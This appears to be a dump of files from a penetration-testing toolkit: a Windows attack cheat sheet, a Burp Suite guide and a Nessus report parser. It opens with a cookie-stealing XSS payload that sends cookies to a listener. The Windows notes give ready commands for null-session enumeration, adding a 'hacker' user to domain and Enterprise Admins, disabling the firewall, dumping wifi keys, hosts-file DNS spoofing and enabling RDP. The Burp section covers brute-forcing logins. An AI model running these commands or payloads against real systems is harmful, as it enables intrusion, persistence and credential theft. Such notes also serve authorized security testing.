159 | <script>alert(document.cookie)</script>
160 | <script>var img = new Image(); img.src=“http://127.0.0.1:8000/?cookie=“+document.cookie;</script>
161 | 
162 | 


--------------------------------------------------------------------------------
/notes/windows.txt:
--------------------------------------------------------------------------------
  1 | Windows
  2 | 
  3 | 
  4 | # Anonymous users can obtain the Windows password policy
  5 | 
  6 | msfconsole
  7 | use auxiliary/scanner/smb/smb_enumusers 
  8 | ------------------------------------------------------------------------------------------------------
  9 | 
 10 | # CIFS NULL Session Permitted
 11 | 
 12 | enum4linux -a <target IP>
 13 | 
 14 | rpcclient -U "" <target IP>
 15 | Enter  's password: <return>
 16 | rpcclient $> 
 17 |   enumdomusers
 18 |   enumdomusers
 19 |   netshareenum
 20 |   netshareenumall
 21 |   querydominfo
 22 |   getdompwinfo
 23 |   srvinfo
 24 | 
 25 | net use \\target IP\ipc$ "" /u:""            # Windows
 26 | ------------------------------------------------------------------------------------------------------
 27 | 
 28 | # CIFS Share Writeable By Everyone
 29 | 
 30 | Places > Network > Browse Network
 31 | 
 32 | ------------------------------------------------------------------------------------------------------
 33 | 
 34 | # Connect anonymously
 35 | 
 36 | smbclient -N -L <target IP>
 37 | 
 38 | # Connect with credentials
 39 | 
 40 | smbclient -W domain -U user -L <target IP>
 41 | ------------------------------------------------------------------------------------------------------
 42 | 
 43 | # NetBIOS and SMB
 44 | 
 45 | nmap -Pn -n -T4 -p139,445 --script=smb-check-vulns --script-args=unsafe=1 <range>
 46 | 
 47 | enum -G <target IP>                         # Windows
 48 | enum -P <target IP>
 49 | 
 50 | nbtenum -r <target IP>                      # Windows
 51 | nbtenum -q <target IP>
 52 | 
 53 | nbtscan -r <target range>
 54 | nbtscan -f hosts.txt
 55 | ------------------------------------------------------------------------------------------------------
 56 | 
 57 | # Show domain users and group information
 58 | 
 59 | DumpSec
 60 | ------------------------------------------------------------------------------------------------------
 61 | 
 62 | # Show members of domain groups
 63 | 
 64 | global.exe "domain admins" \\dc-controller
 65 | ------------------------------------------------------------------------------------------------------
 66 | 
 67 | # Search all folders for filenames that include 'password'.
 68 | 
 69 | dir /s /p *password*.*                      # Windows
 70 | ------------------------------------------------------------------------------------------------------
 71 | 
 72 | # net commands
 73 | 
 74 | net accounts                                # Local password policies.
 75 | net accounts /domain
 76 | net config workstation
 77 | net localgroup                              # Local Security Groups.
 78 | net localgroup /domain                      # Domain Security Groups.
 79 | net localgroup Administrators               # Users in the local Administrators Security Group.
 80 | net localgroup Administrators /domain       # Users in the domain Administrators Security Group.
 81 | net share
 82 | net user                                    # Local users.
 83 | net user /domain > users.txt                # All users in the current user's domain (take a few to run).
 84 | net user hacker /domain                     # Info on domain user.
 85 | net view                                    # Computers in the users domain and other domains.
 86 | net view /domain                            # Computers in other domain.
 87 | 
 88 | net user hacker password /add
 89 | net localgroup administrators /add hacker
 90 | ------------------------------------------------------------------------------------------------------
 91 | 
 92 | # Domain accounts
 93 | 
 94 | net group “Domain Admins" /domain > domain-admin.txt
 95 | net group “Domain Users" /domain > domain-users.txt
 96 | 
 97 | net user hacker password /add /domain
 98 | net group "Enterprise Admins" hacker /add /domain
 99 | net groups "Enterprise Admins" /domain
100 | ------------------------------------------------------------------------------------------------------
101 | 
102 | # Enumeration
103 |  
104 | arp -a
105 | ipconfig /all
106 | ipconfig /displaydns
107 | netstat -ano
108 | netstat -ano | findstr LISTENING
109 | netstat -c
110 | netstat -ns
111 | netstat -vb
112 | route print
113 | 
114 | date /t & time /t
115 | doskey /history
116 | gpresult /COMPUTERNAME
117 | gpresult /%username%
118 | gpresult /z
119 | nbtstat -A <target IP>
120 | nbtstat -a <name of target>
121 | net group
122 | net group administrators
123 | net session
124 | net start
125 | set
126 | tasklist /m
127 | tasklist /svc
128 | tasklist /v
129 | 
130 | dir c:\*.doc /s
131 | dir c:\*.jpg /s
132 | dir c:\*.pdf /s
133 | dir c:\*.ppt /s
134 | dir c:\*.url /s
135 | dir c:\*.xls /s
136 | ------------------------------------------------------------------------------------------------------
137 | 
138 | # Firewall
139 | 
140 | netsh firewall show config
141 | netsh firewall add portopening TCP 8081 ePO
142 | netsh firewall set opmode disable                  Disable firewall.
143 | 
144 | firewall show state
145 | netsh firewall set opmode disable
146 | 
147 | netsh wlan show interfaces
148 | netsh wlan show drivers
149 | netsh wlan show networks
150 | netsh wlan show profiles
151 | netsh wlan show profiles name="name"
152 | show profiles name="name" key=clear
153 | ------------------------------------------------------------------------------------------------------
154 | 
155 | # Local DNS spoofing
156 | 
157 | echo <attacker IP> facebook >> %WINDIR%\System32\drivers\etc\hosts
158 | type %WINDIR%\System32\drivers\etc\hosts
159 | ------------------------------------------------------------------------------------------------------
160 | 
161 | # Misc
162 | 
163 | cd \WINDOWS\system32\
164 | type %SYSTEMDRIVE%\boot.ini
165 | type %WINDIR%\win.ini
166 | fsutil fsinfo drives
167 | 
168 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
169 | 
170 | netsh rdesktop <target-IP>
171 | 
172 | 


--------------------------------------------------------------------------------
/notes/burp.txt:
--------------------------------------------------------------------------------
  1 | Burp Suite
  2 | 
  3 | 
  4 | # Memory
  5 | 
  6 | To manually assign a certain amount of memory (2GB) to Burp: java -jar -Xmx2G <path to Burp>
  7 | ------------------------------------------------------------------------------------------------------
  8 | 
  9 | # Configure Proxy
 10 | 
 11 | Firefox > Preferences > Advanced > Network > Settings
 12 | Manual proxy configuration
 13 | HTTP Proxy: 127.0.0.1
 14 | Port: 8080
 15 | Use this proxy server for all protocols.
 16 | No proxy for: delete anything in here
 17 | ------------------------------------------------------------------------------------------------------
 18 | 
 19 | # Install Certificate
 20 | 
 21 | Start Burp
 22 | Open Firefox to http://burp
 23 | CA Certificate > Save File
 24 | Preferences > Advanced > Certificates > View Certificates > Authorities > Import
 25 | Select the certificate that you previously downloaded > Open
 26 | Check the box "Trust this CA to identify web sites" > OK > OK
 27 | Restart Firefox
 28 | ------------------------------------------------------------------------------------------------------
 29 | 
 30 | # Options
 31 | 
 32 | Inruder > Options:
 33 |      Grep - Match > Clear > Yes
 34 |      Load: /usr/share/wfuzz/wordlist/fuzzdb/regex/errors.txt
 35 | 
 36 | Options > Connections:
 37 |      Platform Authentication: check Prompt for credentials on platform authentication failure
 38 | 
 39 | Options > Display:
 40 |      User Interface > Font size: 16
 41 |      HTTP Message Display > Font: Monospaced 15
 42 | 
 43 | Proxy > Options:
 44 |      Intercept Client Requests:
 45 |      In the list below, enable URL and move to the top.
 46 |      Select File extension > Edit: add jpeg, move to the second position.
 47 | 
 48 |      Intercept Server Responses:
 49 |      Enable Intercept responses based on the following rules.
 50 |      In the list below, disable Content type header.
 51 |      Enable URL and move to the top.
 52 |      Add: And, File extention, Does not match, same Conditions as above.
 53 |      Move to the second position.
 54 | 
 55 |      Miscellaneous:
 56 |      Enable interception at startup: Always disable
 57 | 
 58 | Scanner:
 59 |      Live scanning > Live Passive Scanning: Use suite scope
 60 |      Options:
 61 |           Active Scanning Engine > Number of retries on network failure: 1
 62 |           Active Scanning Optimization > Scan speed: Fast
 63 |           Static Code Analysis > Don’t perform static code analysis
 64 | 
 65 | Spider > Options:
 66 |      Form Submission > Scroll down to age > change to 34
 67 | 
 68 | Target > Scope:
 69 |      Exclude from scope > Add > File: (^.doc.*|^.docx.*|^.xls.*|^.xlsx.*|^.ppt.*|^.pptx.*|^.txt.*|^.pdf.*)
 70 | ------------------------------------------------------------------------------------------------------
 71 | 
 72 | # Scope
 73 | 
 74 | Target > Site map > Filter: restore defaults
 75 | Target > Scope: restore defaults
 76 | 
 77 | Firefox > surf to the target site and click on a couple of links.
 78 | Burp > Target > Site map > right click (RC) on the target URL > Add to scope
 79 | Target > Scope: you will see the URL listed in the top window
 80 | Target > Site map > Filter: enable Show only in-scope items > Filter
 81 | ------------------------------------------------------------------------------------------------------
 82 | 
 83 | # Manually Explore
 84 | 
 85 | Firefox > start exploring the target site by clicking on all of the links on every page.
 86 | Enter a single tick (') in any input field or Search form that you come across.
 87 | ------------------------------------------------------------------------------------------------------
 88 | 
 89 | # Authentication
 90 | 
 91 | Options > Connections > Platform Authentication > Add
 92 |      Destination host: target URL
 93 |      Authentication type: Basic, NTLMv1, NTLMv2 or Digest
 94 |      Username and Password
 95 | Domain and Hostname are only used for NTLM.
 96 | OK
 97 | ------------------------------------------------------------------------------------------------------
 98 | 
 99 | # Intruder
100 | 
101 | RC on any request > Send to Intruder
102 | Intruder > Positions: notice the parameters that are highlighted.
103 | Clear
104 | Highlight the parameter you want to fuzz and click Add.
105 | Intruder > Payloads > Payload Options > Add from list: Fuzzing - full
106 | Start attack
107 | 
108 | Bruteforcing Authentication
109 |      Try to login
110 |      Proxy > History
111 |      Find the POST request
112 |      Send to Intruder
113 |      Intruder > Payloads > Attack type: Cluster bomb
114 |      Clear $
115 |      Highlight the username you entered > Add $ 
116 |      Highlight the password you entered > Add $
117 |      Intruder > Payloads:
118 |           Payload Sets:
119 |                Payload set: 1
120 |                Payload type: Simple list
121 |           Payload Options:
122 |                Clear > Load: your username list
123 |           Payload Sets:
124 |                Payload set: 2
125 |                Payload type: Simple list
126 |           Payload Options:
127 |                Clear > Load: your password list
128 |           Start attack
129 | ------------------------------------------------------------------------------------------------------
130 | 
131 | # Spider
132 | 
133 | Burp > Target > Stie map: RC on the target URL > Spider this host
134 | Spider > Control: watch the Requests made increase.
135 | Form requests will probably appear. You can hit submit or ignor.
136 | ------------------------------------------------------------------------------------------------------
137 | 
138 | # Scanner
139 | 
140 | Spider > Control > Spider is paused
141 | Target > Site Map > RC on the target URL > Actively scan this host
142 | Active scanning wizard: check all boxes > Next > Ok
143 | Scanner > Scan que > RC > Automatically delete finished items > Yes
144 | Scanner > Results
145 | ------------------------------------------------------------------------------------------------------
146 | 
147 | # Manually Validate Findings
148 | 
149 | XML Injection > Search in the Response body for http://www.w3.org/2001/XMLSchema. This is a false positive.
150 | XSS > RC in the Request body > Request in browser > In current browser session
151 | ------------------------------------------------------------------------------------------------------
152 | 
153 | # Reporting
154 | 
155 | Select all remaining findings > RC > Report selected issues > Next 4x > enter file location > Next > Close
156 | 
157 | 


--------------------------------------------------------------------------------
/parse-nessus.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | 
  3 | # Original code from - https://github.com/Clete2/NessusReport, modded by Lee Baird
  4 | # John Kim - additional modification completed to support UTF-8, support cli help, renaming output files
  5 | 
  6 | import csv
  7 | import datetime
  8 | import re
  9 | import sys
 10 | import time
 11 | import utfdictcsv
 12 | import xml.etree.ElementTree as ET
 13 | 
 14 | ################################################################
 15 | 
 16 | class NessusParser:
 17 |     def loadXML(self, filename):
 18 |         self.xml = ET.parse(filename)
 19 |         self.rootElement = self.xml.getroot()
 20 | 
 21 |     def getHosts(self):
 22 |         return self.rootElement.findall("./Report/ReportHost")
 23 | 
 24 | ################################################################
 25 | 
 26 |     def getHostProperties(self, host):
 27 |         properties = {}
 28 | 
 29 |         hostProperties = host.findall("./HostProperties")[0]
 30 | 
 31 |         hostnames = hostProperties.findall("./tag[@name='netbios-name']")
 32 |         if(len(hostnames) >= 1):
 33 |             properties['netbios-name'] = hostnames[0].text
 34 |         properties['host-ip'] = hostProperties.findall("./tag[@name='host-ip']")[0].text
 35 | 
 36 |         hostnames = hostProperties.findall("./tag[@name='operating-system']")
 37 |         if(len(hostnames) >= 1):
 38 |             properties['operating-system'] = hostnames[0].text
 39 |         properties['host-ip'] = hostProperties.findall("./tag[@name='host-ip']")[0].text
 40 | 
 41 |         return properties
 42 | 
 43 | ################################################################
 44 | 
 45 |     def getReportItems(self, host):
 46 |         return host.findall("./ReportItem")
 47 | 
 48 |     def getReportItemProperties(self, reportItem):
 49 |         properties = reportItem.attrib
 50 | 
 51 |         if(properties.has_key('severity')):
 52 |             del(properties['severity'])
 53 | 
 54 |         if(properties.has_key('pluginFamily')):
 55 |             del(properties['pluginFamily'])
 56 | 
 57 |         return properties
 58 | 
 59 | ################################################################
 60 | 
 61 |     def getReportItemDetails(self, reportItem):
 62 |         details = {}
 63 | 
 64 |         details['description'] = reportItem.findall("./description")[0].text
 65 | 
 66 |         pluginElements = reportItem.findall("./plugin_output")
 67 |         if(len(pluginElements) >= 1):
 68 |             details['plugin_output'] = pluginElements[0].text
 69 | 
 70 |         solutionElements = reportItem.findall("./solution")
 71 |         if(len(solutionElements) >= 1):
 72 |             details['solution'] = solutionElements[0].text
 73 | 
 74 |         seealsoElements = reportItem.findall("./see_also")
 75 |         if(len(seealsoElements) >= 1):
 76 |             details['see_also'] = seealsoElements[0].text
 77 | 
 78 |         cveElements = reportItem.findall("./cve")
 79 |         if(len(cveElements) >= 1):
 80 |             details['cve'] = cveElements[0].text
 81 | 
 82 |         cvssElements = reportItem.findall("./cvss_base_score")
 83 |         if(len(cvssElements) >= 1):
 84 |             details['cvss_base_score'] = cvssElements[0].text
 85 | 
 86 |         return details
 87 | 
 88 | ################################################################
 89 | 
 90 | def transformIfAvailable(inputDict, inputKey, outputDict, outputKey):
 91 |     if(inputDict.has_key(inputKey)):
 92 |         inputDict[inputKey] = inputDict[inputKey].replace("\n"," ")
 93 | 
 94 |         # Excel has a hard limit of 32,767 characters per cell. Let's make it an even 32K.
 95 |         if(len(inputDict[inputKey]) > 32000):
 96 |             inputDict[inputKey] = inputDict[inputKey][:32000] +" [Text Cut Due To Length]"
 97 | 
 98 |         outputDict[outputKey] = inputDict[inputKey]
 99 | 
100 | ################################################################
101 | 
102 | if __name__ == "__main__":
103 | 
104 |     if len(sys.argv) > 1:
105 |         header = ['CVSS Score','IP','FQDN','OS','Port','Vulnerability','Description','Proof','Solution','See Also','CVE']
106 | 
107 |         with open("nessus.csv", "wb") as outFile:
108 |             csvWriter = utfdictcsv.DictUnicodeWriter(outFile, header, quoting=csv.QUOTE_ALL)
109 |             csvWriter.writeheader()
110 | 
111 |             nessusParser = NessusParser()
112 | 
113 |             for fileName in sys.argv[1:]:
114 |                 print fileName
115 |                 nessusParser.loadXML(fileName)
116 |                 hostReports = []
117 | 
118 |                 hosts = nessusParser.getHosts()
119 | 
120 |                 for host in hosts:
121 |                     # Get properties for this host
122 |                     hostProperties = nessusParser.getHostProperties(host)
123 | 
124 |                     # Get all findings for this host
125 |                     reportItems = nessusParser.getReportItems(host)
126 | 
127 |                     for reportItem in reportItems:
128 |                         reportItemDict = {}
129 | 
130 |                         # Get the metadata and details for this report item
131 |                         reportItemProperties = nessusParser.getReportItemProperties(reportItem)
132 |                         reportItemDetails = nessusParser.getReportItemDetails(reportItem)
133 | 
134 |                         # Create dictionary for line
135 |                         transformIfAvailable(reportItemDetails, "cvss_base_score", reportItemDict, header[0])
136 |                         transformIfAvailable(hostProperties, "host-ip", reportItemDict, header[1])
137 |                         transformIfAvailable(hostProperties, "netbios-name", reportItemDict, header[2])
138 |                         transformIfAvailable(hostProperties, "operating-system", reportItemDict, header[3])
139 |                         transformIfAvailable(reportItemProperties, "port", reportItemDict, header[4])
140 |                         transformIfAvailable(reportItemProperties, "pluginName", reportItemDict, header[5])
141 |                         transformIfAvailable(reportItemDetails, "description", reportItemDict, header[6])
142 |                         transformIfAvailable(reportItemDetails, "plugin_output", reportItemDict, header[7])
143 |                         transformIfAvailable(reportItemDetails, "solution", reportItemDict, header[8])
144 |                         transformIfAvailable(reportItemDetails, "see_also", reportItemDict, header[9])
145 |                         transformIfAvailable(reportItemDetails, "cve", reportItemDict, header[10])
146 | 
147 |                         hostReports.append(reportItemDict)
148 |                 csvWriter.writerows(hostReports)
149 |         outFile.close()
150 | 
151 |     else:
152 |         print "USAGE: {} input.xml\n " \
153 |               "Any field longer then 32,000 is truncated.".format(sys.argv[0])
154 |         exit()
155 | 
156 | 


--------------------------------------------------------------------------------